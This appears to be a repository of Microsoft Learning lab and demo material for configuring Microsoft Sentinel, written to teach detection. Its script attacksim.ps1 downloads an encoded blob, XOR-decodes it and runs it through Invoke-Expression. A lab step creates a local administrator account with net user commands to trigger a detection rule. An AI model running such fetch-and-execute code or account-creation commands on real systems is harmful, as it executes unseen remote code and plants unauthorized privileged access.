├── .github
├── PULL_REQUEST_TEMPLATE.md
├── ISSUE_TEMPLATE.md
└── CONTRIBUTING.md
├── Instructions
├── Media
│ ├── apl-5001-lab-diagrams-01.png
│ ├── apl-5001-lab-diagrams-lab02.png
│ ├── apl-5001-lab-diagrams-lab03.png
│ └── apl-5001-lab-diagrams-lab04.png
├── Demos
│ ├── DEMO_00_course_introduction.md
│ ├── Ignite_2024_Lab_455-04.md
│ ├── Ignite_2024_Lab_452-01.md
│ ├── Ignite_2024_Lab_452-03.md
│ ├── Ignite_2024_Lab_452-05.md
│ ├── Ignite_2024_Lab_452-02.md
│ ├── Ignite_2024_Lab_452-04.md
│ ├── Ignite_2024_Lab_455-01.md
│ ├── Ignite_2024_Lab_455-02.md
│ ├── Ignite_2024_Lab_452-06.md
│ └── Ignite_2024_Lab_455-03.md
└── Labs
│ ├── LAB_04_perform_analytic_rule_validation.md
│ ├── LAB_01_create_microsoft_sentinel_workspace.md
│ ├── LAB_03_validate-microsoft_sentinel_deploymnent.md
│ └── LAB_02_deploy_microsoft_sentinel_content_hub_solution.md
├── Allfiles
├── Demos
│ └── 01
│ │ └── azuredeploy.json
├── Labs
│ └── 01
│ │ └── Starter
│ │ └── azuredeploy.json
├── attacksim.ps1
├── SC200_module7_ASIM_Parser_scripts.txt
└── SC200_module4_KQL_scripts.txt
├── _config.yml
├── index.md
├── LICENSE
├── _build.yml
└── readme.md
/.github/PULL_REQUEST_TEMPLATE.md:
--------------------------------------------------------------------------------
1 | # Module: 00
2 | ## Lab/Demo: 00
3 |
4 | Fixes # .
5 |
6 | Changes proposed in this pull request:
7 |
8 | -
9 | -
10 | -
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE.md:
--------------------------------------------------------------------------------
1 | # Module: 00
2 | ## Lab/Demo: 00
3 | ### Task: 00
4 | #### Step: 00
5 |
6 | Description of issue
7 |
8 | Repro steps:
9 |
10 | 1.
11 | 1.
12 | 1.
--------------------------------------------------------------------------------
/Instructions/Media/apl-5001-lab-diagrams-01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MicrosoftLearning/configure-siem-security-operations-using-microsoft-sentinel/HEAD/Instructions/Media/apl-5001-lab-diagrams-01.png
--------------------------------------------------------------------------------
/Instructions/Media/apl-5001-lab-diagrams-lab02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MicrosoftLearning/configure-siem-security-operations-using-microsoft-sentinel/HEAD/Instructions/Media/apl-5001-lab-diagrams-lab02.png
--------------------------------------------------------------------------------
/Instructions/Media/apl-5001-lab-diagrams-lab03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MicrosoftLearning/configure-siem-security-operations-using-microsoft-sentinel/HEAD/Instructions/Media/apl-5001-lab-diagrams-lab03.png
--------------------------------------------------------------------------------
/Instructions/Media/apl-5001-lab-diagrams-lab04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MicrosoftLearning/configure-siem-security-operations-using-microsoft-sentinel/HEAD/Instructions/Media/apl-5001-lab-diagrams-lab04.png
--------------------------------------------------------------------------------
/Allfiles/Demos/01/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | },
6 | "variables": {
7 | },
8 | "resources": [
9 | ],
10 | "outputs": {
11 | }
12 | }
--------------------------------------------------------------------------------
/Allfiles/Labs/01/Starter/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | },
6 | "variables": {
7 | },
8 | "resources": [
9 | ],
10 | "outputs": {
11 | }
12 | }
--------------------------------------------------------------------------------
/_config.yml:
--------------------------------------------------------------------------------
1 | remote_theme: MicrosoftLearning/Jekyll-Theme
2 | exclude:
3 | - readme.md
4 | - .github/
5 | header_pages:
6 | - index.html
7 | author: Microsoft Learning
8 | twitter_username: mslearning
9 | github_username: MicrosoftLearning
10 | plugins:
11 | - jekyll-sitemap
12 | - jekyll-mentions
13 | - jemoji
14 | markdown: kramdown
15 | kramdown:
16 | syntax_highlighter_opts:
17 | disable : true
18 |
--------------------------------------------------------------------------------
/Allfiles/attacksim.ps1:
--------------------------------------------------------------------------------
1 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
2 | $xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
3 | $base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
4 | $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
5 | $i++; if ($i -eq $xor.Length) {$i = 0} }; Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
--------------------------------------------------------------------------------
/index.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Online Hosted Instructions
3 | permalink: index.html
4 | layout: home
5 | ---
6 |
7 | # Content Directory
8 |
9 | Hyperlinks to each of the lab exercises and demos are listed below.
10 |
11 | ## Labs
12 |
13 | {% assign labs = site.pages | where_exp:"page", "page.url contains '/Instructions/Labs'" %}
14 | | Module | Lab |
15 | | --- | --- |
16 | {% for activity in labs %}| {{ activity.lab.module }} | [{{ activity.lab.title }}{% if activity.lab.type %} - {{ activity.lab.type }}{% endif %}]({{ site.github.url }}{{ activity.url }}) |
17 | {% endfor %}
18 |
19 | ## Demos
20 |
21 | {% assign demos = site.pages | where_exp:"page", "page.url contains '/Instructions/Demos'" %}
22 | | Module | Demo |
23 | | --- | --- |
24 | {% for activity in demos %}| {{ activity.demo.module }} | [{{ activity.demo.title }}]({{ site.github.url }}{{ activity.url }}) |
25 | {% endfor %}
26 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019 Sidney Andrews
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
--------------------------------------------------------------------------------
/_build.yml:
--------------------------------------------------------------------------------
1 | name: '$(Date:yyyyMMdd)$(Rev:.rr)'
2 | jobs:
3 | - job: build_markdown_content
4 | displayName: 'Build Markdown Content'
5 | workspace:
6 | clean: all
7 | pool:
8 | vmImage: 'Ubuntu 16.04'
9 | container:
10 | image: 'microsoftlearning/markdown-build:latest'
11 | steps:
12 | - task: Bash@3
13 | displayName: 'Build Content'
14 | inputs:
15 | targetType: inline
16 | script: |
17 | cp /{attribution.md,template.docx,package.json,package.js} .
18 | npm install
19 | node package.js --version $(Build.BuildNumber)
20 | - task: GitHubRelease@0
21 | displayName: 'Create GitHub Release'
22 | inputs:
23 | gitHubConnection: 'github-microsoftlearning-organization'
24 | repositoryName: '$(Build.Repository.Name)'
25 | tagSource: manual
26 | tag: 'v$(Build.BuildNumber)'
27 | title: 'Version $(Build.BuildNumber)'
28 | releaseNotesSource: input
29 | releaseNotes: '# Version $(Build.BuildNumber) Release'
30 | assets: '$(Build.SourcesDirectory)/out/*.zip'
31 | assetUploadMode: replace
32 | - task: PublishBuildArtifacts@1
33 | displayName: 'Publish Output Files'
34 | inputs:
35 | pathtoPublish: '$(Build.SourcesDirectory)/out/'
36 | artifactName: 'Lab Files'
37 |
--------------------------------------------------------------------------------
/Instructions/Demos/DEMO_00_course_introduction.md:
--------------------------------------------------------------------------------
1 | ---
2 | demo:
3 | title: 'Demonstration 00: Student materials and lab environment (adjust)'
4 | module: 'Guided Project - Configure SIEM Security Operations with Microsoft Sentinel'
5 | ---
6 | ## Demonstration - Student materials and lab environment (optional)
7 |
8 | Use this demonstration to show students how to access the lab environment and student materials. You can do this at the beginning of class or before the next demonstration.
9 |
10 | ## Show students the lab environment (adjust for your lab hoster)
11 |
12 | - Discuss how students access the lab environment.
13 |
14 | - Explain how to sign-in to the virtual machine host.
15 |
16 | - Explain how to access the [Azure portal](https://portal.azure.com). It is preferred to open the Azure portal in the lab environment instead of a separate window. Ask for a show of hands on how many students have used the portal.
17 |
18 | - Explain what resources, if any, have already been configured for the labs.
19 |
20 | - Review how to use the lab instructions.
21 |
22 | - Add other topics specific to your lab hosting environment.
23 |
24 | ## Show students their course materials.
25 |
26 | - Access the [Microsoft Learn page](https://learn.microsoft.com).
27 |
28 | - Discuss that Microsoft Learn is a great source for all Azure documentation, training, certifications, and assessments.
29 |
30 | - Select **Learning Paths** and then search for the **Configure SIEM security operations using Microsoft Sentinel** learning path.
31 |
32 | - Discuss that the content in the learning path is specific to this course. There is more storage content they can review.
33 |
34 | - Explain the content is reference material and there isn't a 1:1 mapping with the classroom presentations.
35 |
36 | - Discuss that each of these modules may have additional hands-on activities. You will identify these activities as the course progresses.
37 |
38 | - Ask the students to locate and bookmark the learning path.
39 |
--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
1 | # Configure SIEM security operations using Microsoft Sentinel
2 |
3 | - **[Link to labs (HTML format)]( https://microsoftlearning.github.io/configure-siem-security-operations-using-microsoft-sentinel/)**
4 |
5 | - **Are you an MCT?** - Have a look at our [GitHub User Guide for MCTs](https://microsoftlearning.github.io/MCT-User-Guide/)
6 |
7 | ## What are we doing?
8 |
9 | - To support this course, we'll make frequent updates to the course content to keep it current with the Microsoft services used in the course. We're publishing the lab instructions and lab files on GitHub to allow for open contributions between the course authors and MCTs (Microsoft Certified Trainer) to keep the content current with product changes.
10 |
11 | - We hope this brings a sense of collaboration to the labs like we have never had before - when a Microsoft service such as Azure or Microsoft 365 changes and you find it first during a live delivery, go ahead and make an enhancement right in the lab source. Help your fellow MCTs.
12 |
13 | ## How should I use this repository?
14 |
15 | - The instructor materials are your primary source for teaching the course content.
16 |
17 | - These files on GitHub are designed to be used in the course labs, which use the hosted lab environment.
18 |
19 | - It's recommended that for every delivery, trainers check GitHub for any changes that may have been made to support the latest Microsoft cloud services and get the latest files for their delivery.
20 |
21 | ## What about changes to the student handbook?
22 |
23 | - If a student handbook is provided, we'll review the student handbook on a quarterly basis and update through the normal MOC (Microsoft Official Curriculum) release channels as needed.
24 |
25 | ## How do I contribute?
26 |
27 | - Any MCT (Microsoft Certified Trainer) can submit a pull request to the code or content in the GitHub repro. Microsoft and the course author will then triage and include content and lab code changes as needed.
28 |
29 | - You can submit bugs, changes, improvement, and ideas. Find a new Azure or Microsoft 365 feature before we have? Submit a new demo!
30 |
--------------------------------------------------------------------------------
/.github/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contributing to Microsoft Learning Repositories
2 |
3 | MCT contributions are a key part of keeping the lab and demo content current as the Azure platform changes. We want to make it as easy as possible for you to contribute changes to the lab files. Here are a few guidelines to keep in mind as you contribute changes.
4 |
5 | ## GitHub Use & Purpose
6 |
7 | Microsoft Learning is using GitHub to publish the lab steps and lab scripts for courses that cover cloud services like Azure. Using GitHub allows the course’s authors and MCTs to keep the lab content current with Azure platform changes. Using GitHub allows the MCTs to provide feedback and suggestions for lab changes, and then the course authors can update lab steps and scripts quickly and relatively easily.
8 |
9 | > When you prepare to teach these courses, you should ensure that you are using the latest lab steps and scripts by downloading the appropriate files from GitHub. GitHub should not be used to discuss technical content in the course, or how to prep. It should only be used to address changes in the labs.
10 |
11 | It is strongly recommended that MCTs and Partners access these materials and in turn, provide them separately to students. Pointing students directly to GitHub to access Lab steps as part of an ongoing class will require them to access yet another UI as part of the course, contributing to a confusing experience for the student. An explanation to the student regarding why they are receiving separate Lab instructions can highlight the nature of an always-changing cloud-based interface and platform. Microsoft Learning support for accessing files on GitHub and support for navigation of the GitHub site is limited to MCTs teaching this course only.
12 |
13 | > As an alternative to pointing students directly to the GitHub repository, you can point students to the GitHub Pages website to view the lab instructions. The URL for the GitHub Pages website can be found at the top of the repository.
14 |
15 | To address general comments about the course and demos, or how to prepare for a course delivery, please use the existing MCT forums.
16 |
17 | ## Additional Resources
18 |
19 | A user guide has been provided for MCTs who are new to GitHub. It provides steps for connecting to GitHub, downloading and printing course materials, updating the scripts that students use in labs, and explaining how you can help ensure that this course’s content remains current.
20 |
21 |
22 |
--------------------------------------------------------------------------------
/Instructions/Demos/Ignite_2024_Lab_455-04.md:
--------------------------------------------------------------------------------
1 | ---
2 | lab:
3 | title: 'Exercise 4 - Mitigate threats using Microsoft Defender for Cloud'
4 | module: 'Explore Governance Rules'
5 | ---
6 |
7 | # Exercise 4 - Explore Governance Rules
8 |
9 | ## Lab scenario
10 |
11 | Governance rules can identify resources that require remediation according to specific recommendations or severities. Microsoft Defender for Cloud continuously assesses your hybrid and multi-cloud workloads and provides you with recommendations to harden your assets and enhance your security posture. Central security teams often experience challenges when driving the personnel within their organizations to implement recommendations. The rule assigns an owner and due date to ensure the recommendations are handled. Many governance rules can apply to the same recommendations, so the rule with a lower priority value is the one that assigns the owner and due date. Governance rules will help:
12 |
13 | - Security teams: Set accountability for recommendations, track their progress, and drive resource owners to action with notification capabilities.
14 | - Workload owners: Focus on the specific recommendations that require their attention. They'll also be able to delegate recommendations to others or set expectations for when the recommendations will be implemented.
15 |
16 | ### Task 1: Assign Governance Rule
17 |
18 | 1. Under Cloud Security, select Security posture from the left menu items.
19 |
20 | 1. The Secure score defaults to the Azure environment.
21 |
22 | 1. Under the Environment tab, select View recommendations > link.
23 |
24 | 1. Select Add filter and then select Resource type.
25 |
26 | 1. Select **Virtual machine** checkbox and then select the **Apply** button.
27 |
28 | 1. Select any recommendation where the status isn’t “Completed”.
29 |
30 | 1. Review the recommendation and in the Take action tab scroll down to Delegate and select Assign owner & set due date.
31 |
32 | 1. In the Create assignment window, leave Type set to Defender for Cloud and expand the Assignment details.
33 |
34 | 1. In the Set owner Email address box, type in your admin email. Hint: You can copy it from the instructions in the Resources tab.
35 |
36 | 1. Explore the Set remediation timeframe and Set email notifications options and select Create.
37 |
38 | >**Note:** If you see the error Failed to create requested assignments, try again later.
39 |
40 | 1. Close the recommendation page by selecting the ‘X’ on the upper right of the window.
41 |
42 | ## You have completed the lab
43 |
--------------------------------------------------------------------------------
/Instructions/Demos/Ignite_2024_Lab_452-01.md:
--------------------------------------------------------------------------------
1 | ---
2 | lab:
3 | title: 'Exercise 01: Deploy Microsoft Sentinel'
4 | module: 'Guided Project - Create and configure a Microsoft Sentinel workspace'
5 | ---
6 |
7 | ## Exercise overview
8 |
9 | You are a Security Operations Architect working at a company that is implementing Microsoft Sentinel. You are responsible for setting up the Microsoft Sentinel environment to meet the company requirement to minimize cost, meet compliance regulations, and provide the most manageable environment for your security team to perform their daily job responsibilities.
10 | You first task is to deploy a Microsoft Sentinel workspace. The solution must meet the following requirements:
11 |
12 | - Ensure Sentinel data is stored in the West US Azure region.
13 | - Ensure that all Sentinel analytics logs are retained for 180 days.
14 | - Assign roles to Operator1 to ensure that Operator1 can manage incidents and run sentinel playbooks. The solution must meet the principle of least privilege.
15 |
16 | ## Exercise instructions
17 |
18 | ### Task 1 - Create a Log Analytics workspace
19 |
20 | Create a Log Analytics workspace, including region option. Learn more about [onboarding Microsoft Sentinel](https://learn.microsoft.com/azure/sentinel/quickstart-onboard).
21 |
22 | 1. In the Microsoft Edge browser, navigate to the Azure portal at .
23 |
24 | >**Note:** Select the **Resourses** tab for the *Username* and *Password* for the lab. Use the **** account for this lab.
25 |
26 | 1. In the **Sign in** dialog box, copy, and paste in the tenant Email account for the admin username provided by your lab hosting provider and then select **Next**.
27 |
28 | 1. In the **Enter password** dialog box, copy, and paste in the admin's tenant password provided by your lab hosting provider and then select **Sign in**.
29 | 1. In the Search bar of the Azure portal, type "Microsoft Sentinel", then select
30 |
31 | 1. Select **+ Create**.
32 |
33 | 1. Select **Create a new workspace**.
34 |
35 | 1. Select "RG2" as the Resource Group
36 |
37 | 1. Enter a unique name for the Log Analytics workspace
38 |
39 | 1. Select "West US" as the region for the workspace.
40 |
41 | 1. Select **Review + create** to validate the new workspace.
42 |
43 | 1. Select **Create** to deploy the workspace.
44 |
45 | ### Task 2 - Deploy Microsoft Sentinel to a workspace
46 |
47 | Deploy Microsoft Sentinel to the workspace.
48 |
49 | 1. When the workspace deployment completes, select **Refresh** to display the new workspace.
50 |
51 | 1. Select the workspace you want to add Sentinel to (created in Task 1).
52 |
53 | 1. Select **Add**.
54 |
55 | ### Task 3 - Configure data retention
56 |
57 | 1. In the Microsoft Azure "breadcrumb" menu, select **Home**.
58 |
59 | 1. In the Search bar of the Azure portal, type "Log Analytics" and select the workspace created in Task 1.
60 |
61 | 1. Expand the *Settings* section in the navigation menu and select **Usage and estimated costs**.
62 |
63 | 1. Select **Data retention**.
64 |
65 | 1. Change data retention period to **180 days**.
66 |
67 | 1. Select **OK**.
68 |
69 | ## Proceed to Exercise 2
70 |
--------------------------------------------------------------------------------
/Instructions/Labs/LAB_04_perform_analytic_rule_validation.md:
--------------------------------------------------------------------------------
1 | ---
2 | lab:
3 | title: 'Exercise 04: Perform simulated attack'
4 | module: 'Guided Project - Perform a simulated attack to validate Analytic and Automation rules'
5 | ---
6 |
7 | >**Note**: This lab builds on Labs 01, 02 and 03. To complete this lab, you will need an [Azure subscription.](https://azure.microsoft.com/free/?azure-portal=true) in which you have administrative access.
8 |
9 | ## General guidelines
10 |
11 | - When creating objects, use the default settings unless there are requirements that require different configurations.
12 | - Only create, delete, or modify objects to achieve the stated requirements. Unnecessary changes to the environment may adversely affect your final score.
13 | - If there are multiple approaches to achieving a goal, always choose the approach the requires the least amount of administrative effort.
14 |
15 | We need to validate that our Microsoft Sentinel deployment is receiving security events and creating incidents from virtual machines that run Windows.
16 |
17 | ## Architecture diagram
18 |
19 | 
20 |
21 | ## Skilling tasks
22 |
23 | You need to perform a simulated attack to validate that the Analytic and Automation rules create an incident and assign it to the `Operator1`. You will perform a simple `Privilege Escalation` attack on `vm1`.
24 |
25 | ## Exercise instructions
26 |
27 | ### Task 1 - Perform a simulated Privilege Escalation attack
28 |
29 | Use simulated attacks to test analytic rules in Microsoft Sentinel. Learn more about [privilege escalation attack simulation](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md).
30 |
31 | 1. Locate and select the **vm1** virtual machine in Azure and scroll down the menu items to **Operations** and select **Run command**
32 | 1. On the **Run command** pane, select **RunPowerShellScript**
33 | 1. Copy the commands below to simulate the creation of an Admin account into the `PowerShell Script` form and select **Run**
34 |
35 | ```CommandPrompt
36 | net user theusernametoadd /add
37 | net user theusernametoadd ThePassword1!
38 | net localgroup administrators theusernametoadd /add
39 | ```
40 |
41 | >**Note**: Make sure there is only one command per line, and you can rerun the commands by changing the username.
42 |
43 | 1. In the `Output` window you should see `The command completed successfully` three times
44 |
45 | ### Task 2 - Verify an incident is created from the simulated attack
46 |
47 | Verify that an incident is created that matches criteria for the analytic rule and automation. Learn more about [Microsoft Sentinel incident management](https://learn.microsoft.com/azure/sentinel/incident-investigation).
48 |
49 | 1. In `Microsoft Sentinel`, go to the `Threat management` menu section and select **Incidents**
50 | 1. You should see an incident that matches the `Severity` and `Title` you configured in the `NRT` rule you created
51 | 1. Select the `Incident` and the `detail` pane opens
52 | 1. The `Owner` assignment should be **Operator1**, created from the `Automation rule`, and the `Tactics and techniques` should be **Privilege Escalation** (from the `NRT` rule)
53 | 1. Select **View full details** to see all the `Incident management` capabilities and `Incident actions`
54 |
--------------------------------------------------------------------------------
/Instructions/Labs/LAB_01_create_microsoft_sentinel_workspace.md:
--------------------------------------------------------------------------------
1 | ---
2 | lab:
3 | title: 'Exercise 01: Deploy Microsoft Sentinel'
4 | module: 'Guided Project - Create and configure a Microsoft Sentinel workspace'
5 | ---
6 |
7 | >**Note**: To complete this lab, you will need an [Azure subscription.](https://azure.microsoft.com/en-us/free/?azure-portal=true) in which you have administrative access.
8 |
9 | ## General guidelines
10 |
11 | - When creating objects, use the default settings unless there are requirements that require different configurations.
12 | - Only create, delete, or modify objects to achieve the stated requirements. Unnecessary changes to the environment may adversely affect your final score.
13 | - If there are multiple approaches to achieving a goal, always choose the approach the requires the least amount of administrative effort.
14 |
15 | We are currently evaluating the existing security posture of our corporate environment. We need your help in setting up a security information and event management (SIEM) solution to help identify future and ongoing cyber-attacks.
16 |
17 | ## Architecture diagram
18 |
19 | 
20 |
21 | ## Skilling tasks
22 |
23 | You need to deploy a Microsoft Sentinel workspace. The solution must meet the following requirements:
24 |
25 | - Ensure Sentinel data is stored in the West US Azure region.
26 | - Ensure that all Sentinel analytics logs are retained for 180 days.
27 | - Assign roles to Operator1 to ensure that Operator1 can manage incidents and run sentinel playbooks. The solution must meet the principle of least privilege.
28 |
29 | ## Exercise instructions
30 |
31 | ### Task 1 - Create a Log Analytics workspace
32 |
33 | Create a Log Analytics workspace, including region option. Learn more about [onboarding Microsoft Sentinel](https://learn.microsoft.com/azure/sentinel/quickstart-onboard).
34 |
35 | 1. In the Azure portal, search for and select `Microsoft Sentinel`.
36 | 1. Select **+ Create**.
37 | 1. Select **Create a new workspace**.
38 | 1. Select `RG2` as the Resource Group
39 | 1. Enter a valid name for the Log Analytics workspace
40 | 1. Select `West US` as the region for the workspace.
41 | 1. Select **Review + create** to validate the new workspace.
42 | 1. Select **Create** to deploy the workspace.
43 |
44 | ### Task 2 - Deploy Microsoft Sentinel to a workspace
45 |
46 | Deploy Microsoft Sentinel to the workspace.
47 |
48 | 1. When the `workspace` deployment completes, select **Refresh** to display the new `workspace`.
49 | 1. Select the `workspace` you want to add Sentinel to (created in Task 1).
50 | 1. Select **Add**.
51 |
52 | ### Task 3 - Assign a Microsoft Sentinel role to a user
53 |
54 | Assign a Microsoft Sentinel role to a use. Learn more about [Roles and permissions for working in Microsoft Sentinel](https://learn.microsoft.com/azure/sentinel/roles)
55 |
56 | 1. Go to the Resource group RG2
57 | 1. Select **Access control (IAM)**.
58 | 1. Select **Add** and `Add role assignment`.
59 | 1. In the search bar, search for and select the `Microsoft Sentinel Contributor` role.
60 | 1. Select **Next**.
61 | 1. Select the option `User, group, or service principal`.
62 | 1. Select **+ Select members**.
63 | 1. Search for the `Operator1` assigned in your lab instructions `(operator1-XXXXXXXXX@LODSPRODMCA.onmicrosoft.com)`.
64 | 1. Select the `user icon`.
65 | 1. Select **Select**.
66 | 1. Select “Review + assign”.
67 | 1. Select “Review + assign”.
68 |
69 | ### Task 4 - Configure data retention
70 |
71 | Configure data retention [Learn more about data retention](https://learn.microsoft.com/azure/azure-monitor/logs/data-retention-archive).
72 |
73 | 1. Go to the `Log Analytics workspace` created in Task 1 step 5.
74 | 1. Select **Usage and estimated costs**.
75 | 1. Select **Data retention**.
76 | 1. Change data retention period to **180 days**.
77 | 1. Select **OK**.
78 |
79 | >**Note**: For additional practice complete the [Create and manage Microsoft Sentinel workspaces](https://learn.microsoft.com/training/modules/create-manage-azure-sentinel-workspaces/) module.
80 |
--------------------------------------------------------------------------------
/Instructions/Labs/LAB_03_validate-microsoft_sentinel_deploymnent.md:
--------------------------------------------------------------------------------
1 | ---
2 | lab:
3 | title: 'Exercise 03: Validate the Sentinel Deployment'
4 | module: 'Guided Project - Configure Microsoft Sentinel Data Collection rules, NRT Analytic rule and Automation'
5 | ---
6 |
7 | >**Note**: This lab builds on Lab 01 and Lab 02. To complete this lab, you will need an [Azure subscription.](https://azure.microsoft.com/free/?azure-portal=true) in which you have administrative access.
8 |
9 | ## General guidelines
10 |
11 | - When creating objects, use the default settings unless there are requirements that require different configurations.
12 | - Only create, delete, or modify objects to achieve the stated requirements. Unnecessary changes to the environment may adversely affect your final score.
13 | - If there are multiple approaches to achieving a goal, always choose the approach the requires the least amount of administrative effort.
14 |
15 | We need to configure Microsoft Sentinel to receive security events from virtual machines that run Windows.
16 |
17 | ## Architecture diagram
18 |
19 | 
20 |
21 | ## Skilling tasks
22 |
23 | You need to validate the Microsoft Sentinel deployment to meet the following requirements:
24 |
25 | - Configure the Windows Security Events via AMA connector to collect all security events from only a virtual machine named VM1.
26 | - Create a near-real-time (NRT) query rule to generate an incident based on the following query.
27 |
28 | ```KQL
29 | SecurityEvent
30 | | where EventID == 4732
31 | | where TargetAccount == "Builtin\\Administrators"
32 | ```
33 |
34 | - Create an automation rule that assigns Operator1 the Owner role for incidents that are generate by the NRT rule.
35 |
36 | ## Exercise instructions
37 |
38 | >**Note**: In the following tasks, to access `Microsoft Sentinel`, select the `workspace` you created in Lab 01.
39 |
40 | ### Task 1 - Configure Data Collection rules (DCRs) in Microsoft Sentinel
41 |
42 | Configure a Windows Security Events via AMA connector. Learn more about [Windows Security Events via AMA connector](https://learn.microsoft.com/azure/sentinel/data-connectors/windows-security-events-via-ama).
43 |
44 | 1. In `Microsoft Sentinel`, go to the `Configuration` menu section and select **Data connectors**
45 | 1. Search for and select **Windows Security Events via AMA**
46 | 1. Select **Open connector page**
47 | 1. In the `Configuration` area, select **+Create data collection rule**
48 | 1. On the `Basics` tab enter a `Rule Name`
49 | 1. On the `Resources` tab expand your subscription and the `RG1` resource group in the `Scope` column
50 | 1. Select `VM1`, and then select **Next: Collect >**
51 | 1. On the `Collect` tab leave the default of `All Security Events`
52 | 1. Select **Next: Review + create >**, then select **Create**
53 |
54 | ### Task 2 - Create a near real-time (NRT) query detection
55 |
56 | Detect threats with near-real-time (NRT) analytic rules in Microsoft Sentinel. Learn more about [NRT Analytic rules in Microsoft Sentinel](https://learn.microsoft.com/azure/sentinel/near-real-time-rules).
57 |
58 | 1. In `Microsoft Sentinel`, go to the `Configuration` menu section and select **Analytics**
59 | 1. Select **+ Create**, and **NRT query rule (Preview)**
60 | 1. Enter a `Name` for the rule, and select **Privilege Escalation** from `Tactics and techniques`.
61 | 1. Select **Next: Set rule logic >**
62 | 1. Enter the KQL query into the `Rule query`form
63 |
64 | ```KQL
65 | SecurityEvent
66 | | where EventID == 4732
67 | | where TargetAccount == "Builtin\\Administrators"
68 | ```
69 |
70 | 1. Select **Next: Incident settings >**, and select **Next: Automated response >**
71 | 1. Select **Next: Review + Create**
72 | 1. When validation is complete select **Save**
73 |
74 | ### Task 3 - Configure automation in Microsoft Sentinel
75 |
76 | Configure automation in Microsoft Sentinel. Learn more about [Create and use Microsoft Sentinel automation rules](https://learn.microsoft.com/azure/sentinel/create-manage-use-automation-rules).
77 |
78 | 1. In `Microsoft Sentinel`, go to the `Configuration` menu section and select **Automation**
79 | 1. Select **+ Create**, and Automation rule
80 | 1. Enter an `Automation rule name`, and select **Assign owner** from `Actions`
81 | 1. Assign **Operator1** as the owner.
82 | 1. Select **Apply**
83 |
--------------------------------------------------------------------------------
/Instructions/Demos/Ignite_2024_Lab_452-03.md:
--------------------------------------------------------------------------------
1 | ---
2 | lab:
3 | title: 'Exercise 03: Connect Windows devices to Microsoft Sentinel using data connectors'
4 | module: 'Guided Project - Connect Windows devices to Microsoft Sentinel using data connectors'
5 | ---
6 |
7 | ## Exercise overview
8 |
9 | You're a Security Operations Analyst working at a company that implemented Microsoft Sentinel. You must learn how to connect log data from the many data sources in your organization. The next source of data is Windows virtual machines inside and outside of Azure, like On-Premises environments or other Public Clouds.
10 |
11 | ## Exercise instructions
12 |
13 | ### Task 1: Access the Microsoft Sentinel Workspace
14 |
15 | In this task, you will access your Microsoft Sentinel workspace.
16 |
17 | 1. Log in to WIN1 virtual machine as Admin with the password: Pa55w.rd.
18 |
19 | 1. Open the Microsoft Edge browser.
20 |
21 | 1. In the Edge browser, navigate to the Azure portal at .
22 |
23 | >**Note:** Select the **Resourses** tab for the *Username* and *Password* for the lab. Use the **** account for this lab.
24 |
25 | 1. In the Sign in dialog box, copy, and paste in the Tenant Email account provided by your lab hosting provider and then select Next.
26 |
27 | 1. In the Enter password dialog box, copy, and paste in the Tenant Password provided by your lab hosting provider and then select Sign in.
28 |
29 | 1. In the Search bar of the Azure portal, type Sentinel, then select Microsoft Sentinel.
30 |
31 | 1. Select your Microsoft Sentinel Workspace that you created in the previous lab.
32 |
33 | 1. Proceed to the next task.
34 |
35 | ### Task 2: Install the Windows Security Events solution
36 |
37 | 1. In the Search bar of the Azure portal, type *Sentinel*, then select **Microsoft Sentinel**.
38 |
39 | 1. Select your Microsoft Sentinel Workspace you created earlier.
40 |
41 | 1. 1. In the Microsoft Sentinel left navigation menu, scroll down to the *Content management* section and select **Content Hub**.
42 |
43 | 1. In the *Content hub*, search for the **Windows Security Events** solution and select it from the list.
44 |
45 | 1. On the *Windows Security Events* solution page select **Install**.
46 |
47 | 1. When the installation completes select **Manage**
48 |
